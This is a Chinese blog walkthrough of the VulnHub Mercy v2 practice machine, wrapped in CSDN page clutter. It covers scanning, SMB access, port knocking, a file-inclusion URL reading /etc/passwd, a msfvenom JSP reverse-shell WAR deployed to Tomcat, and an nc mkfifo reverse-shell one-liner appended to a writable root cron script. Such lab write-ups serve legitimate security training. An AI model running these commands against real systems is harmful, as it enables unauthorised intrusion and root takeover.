vulnhub mercy v2

最新推荐文章于 2024-08-20 11:00:00 发布
最新推荐文章于 2024-08-20 11:00:00 发布
阅读量1.6k 收藏
点赞数
分类专栏: 靶机渗透 web 文章标签: web安全 渗透测试 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/123040796
版权

nmap扫描主机和开放的端口

靶机IP:10.0.2.52

进入8080端口

发现 host-manager需要输入用户名和密码

 gobuster扫描

进入robots

 

进入上述目录

 放在解密网站里解密

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

 

 得到一个密码password,尝试利用admin:password登录manager,发现不可行

enum4linux爆破smb服务

 

尝试用password的密码以及上面的用户名登录,发现qiu:password可以登录成功

下载文件夹里的文件,查看,在config里面发现信息

 

利用knock敲门,打开http服务

knock -v 10.0.2.52 159 27391 4

 再次扫描端口

进入80端口的robots.txt文件

 

进入上面的目录,在第二个文件里发现信息

 

 搜索rips相关的漏洞

 查看第二个文件

直接访问上面的文件

访问passwd文件

http://10.0.2.52/nomercy/windows/code.php?file=/../../../../../../etc/passwd

 注意上面得到的一句话

访问上述文件

 

在最下面的得到了用户名和密码,拿去访问8080端口的manager目录,发现可行

 

msfvenom生成war反弹shell

msfvenom -p java/jsp_shell_reverse_tcp  LHOST=10.0.2.4 LPORT=4444 -f war > 123.war

 直接部署在tomcat里面,然后msf提前开启监听,payload就用上面的,然后即可得到shell

根据上面得到的fluffy:freakishfluffybunny,切换fluffy用户,查看当前文件

发现timeclock文件是777的权限,有两种方法,可以写入反弹shell,获取root权限,也可以写入添加一个root权限的用户到passwd文件里

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 10.0.2.4 888 >/tmp/f" >> timeclock

 kali提前开启监听,即可得到root权限

mrwangtw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1413
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
Vulnhub:Digitalworld.local (Mercy v2)靶机
qq_43884092的博客
04-10 485
使用enum4linux对目标smb服务进行枚举,8080端口的网站robots.txt提示存在一个文件访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password,使用用户qiu和密码:password,查看目标文件共享,在\\.private\opensesame目录下存放有两个文件,查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中,使用knock进行端口碰撞开启22和80端口
靶机渗透练习55-digitalworld.local:MERCY v2
hirak0的博客
04-19 7532
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ Description MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. 😃 MERCY is a name-play
Vulnhub靶机 Digitalworld.local (Mercy v2)
菜浪马废的博客
05-04 463
i在这里插入图片描述 敲门呗 还可以内核提权
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权)
冬萍子癸水
04-25 1205
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2
分享
12-22 588
红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2 , 犹如猛犬撕咬般的疼痛感......
mercy2
03-16
【标题】"mercy2" 是一个项目或者应用的名称,可能是一个软件开发中的特定版本或者迭代。在IT行业中,项目名通常是具有代表性的,可能是为了反映项目的特点、目标或者团队的文化。在这种情况下,"mercy2" 可能暗示着...
dmas_android_app_v2:Divine Mercy Daily SMS 服务 Android 应用程序。 版本 2
07-21
《Divine Mercy Daily SMS服务Android应用详解:V2版本与Gradle构建》 Divine Mercy Daily SMS服务Android应用程序是一款专为信徒设计的应用,旨在提供每日的神圣慈悲信息,通过SMS形式传递给用户,以增强信仰生活...
Mercy Overwatch Wallpapers and New Tab-crx插件
03-15
Mercy守望先锋高清壁纸和全新标签主题,带来最佳浏览体验 我们已经为《守望先锋》游戏的所有粉丝准备了此Mercy扩展程序。 它提供了完美品质的壁纸,将为您的浏览器带来全新的外观。 此外,它们将在您每次打开新标签...
Mars, Land of No Mercy-开源
04-27
回合制策略游戏,具有等距图形,原始情节,原始配乐等。 玩家带领一支雇佣队前往火星,并使用机甲和其他军车与不同派系作战。
Overwatch Mercy HD Wallpaper New Tab Themes-crx插件
03-16
为《守望先锋》的粉丝制作的带有HD Mercy壁纸的新Tab主题。 守望先锋怜悯新标签-由FreeAddon提供安装我的守望先锋怜悯新标签主题,并在每次打开新选项卡时,享受守望先锋怜悯的各种高清壁纸。 ★您可以从我们的守望...
OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
weixin_47311099的博客
11-15 1039
OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
VulnHub】【2023年07月18日】最新全部靶场详情(中)
惟忆
07-18 9505
VulnHub】【2023年07月18日】最新全部靶场详情(中)
digitalworld.local: JOY靶机-Walkthrough
ins1ght的博客
10-02 634
通过FTP匿名账户获取directory,对其中的信息筛选后,确定version_control为线索。site cpto将version_control拷贝到FTP的upload文件夹,最终发现ProFTPD存在命令执行漏洞,成功getshell。之后发现了patrick用户的密码,切换用户后,发现了sudo权限的test。由于patrick没有test的写权限,于是先创建一个test,内容为/bin/sh,后用put test上传到upload文件夹中,最后使用site cpto覆盖原有test,提权。
零基础转行学网络安全怎么样?
qq_35254085的博客
08-19 194
网络安全涉及众多复杂的知识和技术,需要学习编程基础、网络安全漏洞知识、SQL 注入、XSS 跨站脚本漏洞等一系列内容,还需要掌握各种工具的使用,这需要付出大量的时间和精力去学习和实践。可以通过看书学习基础知识,网上找视频直观学习操作,参加靠谱的培训机构获取系统学习方案和指导,进行真实靶机练习等方式,逐步提升自己的能力。对于零基础的转行人员来说,网络安全行业也具有一定的包容性。它不像传统行业存在众多“关系户”,对学历的要求并非硬性,只要拥有扎实的技术和一定的实战能力,就能获得高薪和良好的职业发展机会。
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1184
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
近年国际重大网络安全事件深度剖析:安全之路任重道远
最新发布
2301_77160226的博客
08-20 642
在当今数字化时代,网络安全已成为全球关注的焦点。随着信息技术的飞速发展,网络攻击的手段和规模也在不断升级,给个人、企业和国家带来了巨大的威胁。本文将盘点近年来国际上发生的重大网络安全事件,分析其影响和教训,以期提高人们对网络安全的重视程度。
网络安全之xss靶场练习
bb_lo的博客
08-18 1053
靶场地址页面显示如下。
Web安全:SqlMap工具
qq_55038440的博客
08-16 1184
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
what's the difference between compassion and mercy
02-17
同情和怜悯有一定的区别。同情通常指对他人处境的理解和共情,而怜悯则更强调在同情的基础上给予援助或宽恕。换句话说,同情是情感上的共鸣,而怜悯则是行动上的体现。举例来说,如果你同情一个人因生活困难而感到沮丧,你可能会告诉他你理解他的感受。但如果你怜悯这个人,你可能会采取实际行动,比如提供帮助或者原谅他犯下的错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值